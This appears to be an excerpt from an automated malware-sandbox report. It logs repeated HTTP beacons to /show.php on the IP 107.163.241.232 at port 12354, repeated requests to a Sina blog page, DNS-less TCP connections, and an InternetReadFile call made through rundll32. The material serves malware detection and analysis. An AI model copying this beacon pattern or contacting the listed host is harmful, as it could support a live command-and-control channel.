Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: unknownTCP traffic detected without corresponding DNS query: 107.163.241.232
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10004990 InternetReadFile,5_2_10004990
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnConnection: Keep-AliveCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
